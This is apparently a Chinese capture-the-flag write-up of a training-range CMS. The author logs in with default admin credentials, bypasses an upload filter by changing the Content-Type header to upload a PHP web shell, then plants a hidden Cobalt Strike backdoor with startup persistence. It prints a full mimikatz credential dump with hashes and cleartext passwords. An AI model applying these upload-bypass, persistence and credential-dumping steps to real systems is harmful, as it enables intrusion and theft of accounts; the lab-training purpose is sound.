绕过防护getshell

0x01. 明确目标

https://hack.zkaq.cn/battle/target?id=641b720edbd0e2b6

绕过防护getshell_上传

估计是一个通过注入点 , 然后一步一步拿到shell的 , 然后拿到flag

0x02. 主要思路

http://59.63.200.79:8003/bees/

绕过防护getshell_上传_02

首先这个站点是一个cms站 , 既然是getshell , 那肯定是从后台下手比较好 , 直接在url后接admin试试

http://59.63.200.79:8003/bees/admin/login.php

绕过防护getshell_d3_03

果不其然是默认后台没有改 , 既然都到这了 , 那就admin/admin试试呗

绕过防护getshell_d3_04

我靠 , 这靶场是真的是0基础啊 , 话不多说 , 找上传点把 , 刚点进去就在网站设置的基本设置下找到了一个上传图

片的上传入口

绕过防护getshell_上传_05

二话不说 , 先点击去试试

绕过防护getshell_d3_06

绕过防护getshell_5e_07

既然是白名单过滤 , 进一步尝试是不是扩展名白名单过滤 , 还是检测的文件头 , 或者MIME类型呢?

0x03. 抓包调试

截取上传文件的请求包

绕过防护getshell_5e_08

直接上传 , 果然是被拦截的

绕过防护getshell_d3_09

尝试修改Content-Type头

Content-Type: image/png

绕过防护getshell_d3_10

上传成功 , 查看图片路径 , 菜刀连接

/upload/img/202101301633172903.php

绕过防护getshell_5e_11

0x04. getshell

http://59.63.200.79:8003/bees/upload/img/202101301633172903.php

绕过防护getshell_上传_12

flag_{axdeDaf}

提交flag , 完美结束 , 通过一个白名单绕过 , 就轻轻松松getshell了 , 还有题目提示的注入点呢 ?

楼一眼权限

绕过防护getshell_5e_13

果然用phpstudy搭建的站点默认都是system权限

绕过防护getshell_5e_14

一台搭建在虚拟机上的2003 , 试试扔一个后门试试? 没错cs搞起来

而且还把后门放到了一个系统级别的隐藏文件夹中, 同时把他copy到了启动项

通过cs简单看看密码吧

beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 633426 bytes
[+] received output:

Authentication Id : 0 ; 27520470 (00000000:01a3edd6)
Session : RemoteInteractive from 4
User Name : Administrator
Domain : GONGKAIK-D45FB6
Logon Server : GONGKAIK-D45FB6
Logon Time : 2020-12-12 0:30:09
SID : S-1-5-21-2775063910-2920827999-2173817585-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GONGKAIK-D45FB6
* LM : 4d582fa9df7504345e8e7baade1462e6
* NTLM : 43322078afa889e76ead4e24593fe0f6
* SHA1 : 0da6cbfad62801060ae66a9d6c1d75599f354f44
wdigest :
* Username : Administrator
* Domain : GONGKAIK-D45FB6
* Password : wow!yougotit!
kerberos :
* Username : Administrator
* Domain : GONGKAIK-D45FB6
* Password : wow!yougotit!
ssp :
credman :

Authentication Id : 0 ; 251204 (00000000:0003d544)
Session : NetworkCleartext from 0
User Name : IUSR_GONGKAIK-D45FB6
Domain : GONGKAIK-D45FB6
Logon Server : GONGKAIK-D45FB6
Logon Time : 2020-10-30 21:39:09
SID : S-1-5-21-2775063910-2920827999-2173817585-1003
msv :
[00000002] Primary
* Username : IUSR_GONGKAIK-D45FB6
* Domain : GONGKAIK-D45FB6
* LM : 987d337aa99a3f68a6c7930727053580
* NTLM : 1d77c613a0ce4675e78682520826a6db
* SHA1 : 32d407c860a6d70f5f8c84721bd2cef76a0d6143
wdigest :
* Username : IUSR_GONGKAIK-D45FB6
* Domain : GONGKAIK-D45FB6
* Password : c0\T1N/7.u)ENp
kerberos :
* Username : IUSR_GONGKAIK-D45FB6
* Domain : GONGKAIK-D45FB6
* Password : c0\T1N/7.u)ENp
ssp :
credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : NETWORK SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2020-8-13 22:07:19
SID : S-1-5-20
msv :
[00000002] Primary
* Username : GONGKAIK-D45FB6$
* Domain : WORKGROUP
* LM : aad3b435b51404eeaad3b435b51404ee
* NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
* SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709
wdigest :
* Username : GONGKAIK-D45FB6$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : gongkaik-d45fb6$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 644823 (00000000:0009d6d7)
Session : RemoteInteractive from 1
User Name : Administrator
Domain : GONGKAIK-D45FB6
Logon Server : GONGKAIK-D45FB6
Logon Time : 2020-10-30 21:47:50
SID : S-1-5-21-2775063910-2920827999-2173817585-500
msv :
[00000002] Primary
* Username : Administrator
* Domain : GONGKAIK-D45FB6
* LM : 4d582fa9df7504345e8e7baade1462e6
* NTLM : 43322078afa889e76ead4e24593fe0f6
* SHA1 : 0da6cbfad62801060ae66a9d6c1d75599f354f44
wdigest :
* Username : Administrator
* Domain : GONGKAIK-D45FB6
* Password : wow!yougotit!
kerberos :
* Username : Administrator
* Domain : GONGKAIK-D45FB6
* Password : wow!yougotit!
ssp :
credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2020-8-13 22:07:20
SID : S-1-5-19
msv :
wdigest :
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :

Authentication Id : 0 ; 47925 (00000000:0000bb35)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2020-8-13 22:07:18
SID :
msv :
wdigest :
kerberos :
ssp :
credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : GONGKAIK-D45FB6$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2020-8-13 22:07:18
SID : S-1-5-18
msv :
wdigest :
kerberos :
* Username : gongkaik-d45fb6$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :

* Password : wow!yougotit!      # 感觉这个才是比flag更彩的彩蛋                         哇     你得到了 它

0x05. 关于注入点

请看那一关的视频介绍 , 多读书 , 多看报 , 少吃零食 , 早睡觉